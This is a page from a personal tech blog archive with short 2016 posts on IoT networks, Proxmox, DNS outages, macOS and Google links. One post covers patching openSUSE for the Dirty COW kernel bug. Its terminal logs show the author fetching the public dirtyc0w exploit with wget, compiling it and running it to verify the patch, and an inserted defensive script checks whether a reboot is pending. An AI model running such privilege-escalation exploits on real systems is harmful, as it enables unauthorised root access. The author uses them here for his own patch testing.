The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests


Archive for 2016

I don’t have #IoT. I have #LoT. LAN of things. 

Posted by jpluimers on 2016/10/24

Interesting thought:

I don’t have #IoT. I have #LoT. LAN of things. My gadgets have no default gateway and cannot talk to the internet. Simple. Now I’m hoping for broad supp… – Jan Wildeboer – Google+

The idea: devices live in a separate LAN (or VLAN) with no default gateway, with some firewall rules to access them from your regular LAN, and you update them through fwupd, an open source firmware updater.

Sounds like a dream? We should all make it come true!

Read I don’t have #IoT. I have #LoT. LAN of things. for more ideas.

–jeroen

Posted in IoT Internet of Things, Network-and-equipment, Power User | Leave a Comment »

Some links on converting non KVM VMs to Proxmox

Posted by jpluimers on 2016/10/24

Gut feeling indicates I need these someday:

From VHD to Proxmox you need to convert to RAW not IMG:

# qemu-img convert -f vpc -O raw PATH/to/DISK.vhd PATH/to/DISK.raw

–jeroen

Posted in Power User, Proxmox, Virtualization | Leave a Comment »

List of “Plain Text Offenders”; hopefully someone publishes a list of https offenders too

Posted by jpluimers on 2016/10/24

This Plain Text Offenders site lists email screenshots of organisations sending back plain-text passwords they kept on file (According to Robert Love, Idera/Embarcadero should be on the list as well).

It is one of the most horrible things that can be done for a password.

Business and IT do many horrible things, so I really hope someone will start a similar site about SSL Labs F-rated domains. The ones that are so broken that they degraded their https to virtually plain-text http quality.

A notorious example of this was Embarcadero, who in the past managed to get an F-rating or had wrong configurations on the below domains, therefore preventing me from logging in and getting new products from them (which is far worse than them not cleaning up their bug database):

Posted in Delphi, Development, Hashing, https, OpenSSL, Power User, Public Key Cryptography, QC, Security, Signing, Software Development | 3 Comments »

The IoT strikes back again: half a million IoT devices killed DYN DNS for hours, but fixing this will be hard

Posted by jpluimers on 2016/10/22

Less than a month after “The IoT strikes back: 650 Gigabit/second and 1 Terabit/second attacks by IoT devices within a week”, the IoT struck back again: an estimated half a million IoT devices were used to perform multiple DDoS attacks against Dyn Managed DNS that took around 11 hours to resolve.

Google DNS appears to “live” near me in Amsterdam

High availability usually involves a mix of DNS TTL and/or BGP routing. That’s typically how CDN providers like Cloudflare work (it’s one of the reasons that global DNS servers like Google’s 8.8.8.8 appear near to you, and that over time the routes to it, some of them MPLS, change). A short DNS TTL can help a CDN, but it requires a very stable DNS infrastructure and is similar to, but different from, a Fast Flux network.

Last month’s attacks were on a security researcher and a single ISP. The Dyn DNS attack affected even more internet services (not just sites like Twitter, WhatsApp, AirBnB and Github). So I’m with Bruce Schneier that Someone Is Learning How to Take Down the Internet.

Handling these attacks is hard as the DDoS mitigation firms simply cannot handle the sudden increase of attack sizes yet. BCP38 should be part of mitigation, but the puzzle is big and fixing it won’t be easy, though root causes of bugs change as a lot of research is in progress.

I’m not alone in expecting it to get worse though before getting better.

On the client side, I learned that many users could cope by changing their DNS servers to either of these Public DNS Servers:

  • OpenDNS 208.67.222.222, 208.67.220.220, 208.67.222.220, 208.67.220.222
    • OpenDNS does a good job of handing “last known good” IPs when they can’t resolve.
  • Google Public DNS 8.8.8.8, 8.8.4.4
  • Level 3 DNS 4.2.2.1, 4.2.2.2, 4.2.2.3, 4.2.2.4, 4.2.2.5, 4.2.2.6

Some more interesting tidbits on the progress and mitigation of this particular attack are the heat-maps over time of affected regions and the BGP routing changes below.

Posted in CDN (Content Delivery Network), Cloud, Cloudflare, DNS, Hardware, Infrastructure, Internet, IoT Internet of Things, Network-and-equipment, Opinions, Power User | Leave a Comment »

display – How can I move spaces between external monitors in Mavericks? – Ask Different

Posted by jpluimers on 2016/10/21

display – How can I move spaces between external monitors in Mavericks? – Ask Different [WayBack]

You can only move spaces which are non-active.

For example, let’s say you have spaces 1 and 2. If space 1 is active, you cannot move it. You first have to select space 2, then you can move space 1 to a different monitor.

This helped me work around version 8.35 of Microsoft Remote Desktop for OS X breaks second monitor usage [WayBack]:

  1. Double click a connection so it goes to a new space on the primary display
  2. Make the normal space active (by three finger swiping on the primary display)
  3. Go to mission control
  4. Move the non-active RDP space to the secondary monitor

Sometimes the primary monitor doesn’t have a non-active space any more so you have to create a new one in the top right of Mission Control [WayBack].

–jeroen

Posted in Apple, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Pro, OS X 10.9 Mavericks, Power User, Remote Desktop Protocol/MSTSC/Terminal Services, Windows | Leave a Comment »

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

Posted by jpluimers on 2016/10/21

There is a nasty Linux kernel bug (Dirty COW: CVE-2016-5195) with zero-day exploits floating around.

openSUSE updates will be available soon (likely this weekend); from the #openSUSE-factory IRC channel:

wiert: any E.T.A. for CVE-2016-5195 in the various releases?

_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow

wiert: How about Tumbleweed?

DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday

via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]

Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.

Edit: 13.2 didn’t make it on Monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752

More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

–jeroen

Testing 13.2:

# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch

This works fine while awaiting the formal update process, and my testing it resulted in the release of the kernel to the official 13.2 update. Note that you still have to reboot after the update, even though the process doesn’t tell you that:

wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kernel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt


# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done]
Loading repository data…
Reading installed packages…
Resolving package dependencies…
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)]
Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done]
(1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut --logfile /var/log/YaST2/mkinitrd.log --force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot


(1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut --logfile /var/log/YaST2/mkinitrd.log --force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
(2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done]


$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su -
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su -
# cat foo
this is not a test
# logout


$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su -
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su -
# reboot
login
$ cd /tmp/
$ sudo su -
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test
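
The before/after reboot comparison above shows that installing the fixed kernel is not enough: the old kernel keeps running until the reboot. The script below is an added example (not part of the original post or the gist) that turns that check into something you can run after `zypper patch`. The function names are made up for this example; the fixed release is the openSUSE 13.2 kernel from the zypper log above, and it assumes GNU `sort -V` and kernels of one flavour.

```shell
#!/bin/sh
# Added example: after a kernel update, tell "patched" apart from
# "fix installed but old kernel still running".
# FIXED_RELEASE is the openSUSE 13.2 kernel from the zypper log above;
# other distributions and releases need their own value (assumption).
FIXED_RELEASE="3.16.7-45-default"

# version_ge A B: succeed when release A sorts at or after release B.
# Relies on GNU "sort -V"; only meaningful within one kernel flavour.
version_ge() {
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | tail -n 1)" = "$1" ]
}

# newest_release LIST: print the highest release of a newline-separated list.
newest_release() {
    printf '%s\n' "$1" | sed '/^$/d' | sort -V | tail -n 1
}

# installed_releases [DIR]: one release per module directory
# (default /lib/modules, which is named after "uname -r").
installed_releases() {
    for d in "${1:-/lib/modules}"/*/; do
        if [ -d "$d" ]; then basename "$d"; fi
    done
}

# kernel_status RUNNING INSTALLED_LIST FIXED
# prints one of: patched | reboot-needed | update-needed
kernel_status() {
    running=$1
    newest=$(newest_release "$2")
    fixed=$3
    if version_ge "$running" "$fixed"; then
        echo patched
    elif [ -n "$newest" ] && version_ge "$newest" "$fixed"; then
        echo reboot-needed      # fix is on disk, old kernel still in memory
    else
        echo update-needed      # no installed kernel carries the fix
    fi
}

# Only touch the live system when asked to: sh kernel-check.sh check
if [ "${1:-}" = "check" ]; then
    status=$(kernel_status "$(uname -r)" "$(installed_releases)" "$FIXED_RELEASE")
    echo "running $(uname -r): $status"
    [ "$status" = "patched" ]   # exit code 0 only when the running kernel is fixed
fi
```

Run with `check` it exits non-zero until the machine has actually booted the fixed kernel, so it can gate a monitoring check or a post-update hook.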

Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

FileZilla on Windows is waaaay faster than WinSCP

Posted by jpluimers on 2016/10/21

Not sure why yet, but on a gigabit network between a Windows 2008 R2 Server and a Proxmox KVM machine, WinSCP gets around 10 megabit/second and FileZilla > 30 megabit/second.

Others seem to agree that FileZilla is faster than WinSCP.

–jeroen

Posted in Communications Development, Development, Internet protocol suite, Power User, Proxmox, SSH, TCP, Virtualization, VMware, Windows, Windows Server 2008, Windows Server 2008 R2 | 1 Comment »

Some Google URLs

Posted by jpluimers on 2016/10/21

Below is a table with clickable links; details are in the via link at the end. I added some more beyond the 10 original ones.

# URL What
1 https://accounts.google.com/SignUpWithoutGmail Get a new account
2 https://www.google.com/ads/preferences Manage advertisement profile
3 https://www.google.com/takeout Download your Google data (mail can take days!)
4 https://support.google.com/legal To file a complaint about using copyrighted or unpermissioned material
5 https://maps.google.com/locationhistory Shows where your devices have been
6 https://history.google.com All your searches
7 https://www.google.com/settings/account/inactive Prevent extended inactivity, Google doesn’t delete your account after 9 months.
8 https://security.google.com/settings/security/activity When you suspect account abuse
9 https://security.google.com/settings/security/permissions Set permissions of apps and sites relating to your account
10 https://admin.google.com/example.org/VerifyAdminAccountPasswordReset Apps users: reset admin account by adding a CNAME to the DNS
11 https://plus.google.com G+ / Google Plus
12 https://plus.google.com/hangouts Google Hangouts
13 https://gmail.com GMail / Google Mail
14 https://contacts.google.com Google Contacts (note + button to add is hidden behind Hangouts pop-up also on the lower right)
15 https://calendar.google.com Calendar / Agenda
16 https://www.google.com/sync Sync Google Settings between various devices / applications
17 https://myaccount.google.com Account and privacy settings
18 https://myaccount.google.com/security Security settings like two-factor authentication (2-step signin)
19 https://security.google.com/settings/security/secureaccount Check if your security settings (recovery phone, recovery email, security question) are still up to date.
20 https://myaccount.google.com/privacycheckup/1 Setting your privacy
21 https://wallet.google.com Manage Wallet
22 https://play.google.com Google Play Store and settings
23 https://www.google.com/android/devicemanager Where is your Android device

–jeroen

via: Some Imporatant URLs you should know as a Google User – I am Programmer.

Posted in GMail, Google, Power User | Leave a Comment »

Tim Anderson did have Amazon S3 to work from Delphi in 2006

Posted by jpluimers on 2016/10/20

I will probably need this in the future as occasionally I still do Delphi work:

–jeroen

Posted in Delphi, Delphi 2006, Delphi 7, Development, Software Development | 2 Comments »

Merging multiple commands and piping it to one output.

Posted by jpluimers on 2016/10/20

The unix shell is hard, but boy, sometimes it can work like magic, for instance piping two testssl.sh commands into one gist:

retinambpro1tb:testssl.sh jeroenp$ ( ./testssl.sh --version ; ./testssl.sh --local ) | gist -d "testsll version and local ciphers for Mac OS X Darwin binarries supporting zlib"
https://gist.github.com/701496d7fbf929967aa1

The source of this magic was this AskUbuntu answer: How to merge and pipe results from two different commands to single command? – Ask Ubuntu

–jeroen

via: openssl.Darwin.x86_64 lacks zlib support · Issue #164 · drwetter/testssl.sh

Posted in *nix, *nix-tools, bash, bash, Development, Power User, Scripting, Software Development, Uncategorized | Leave a Comment »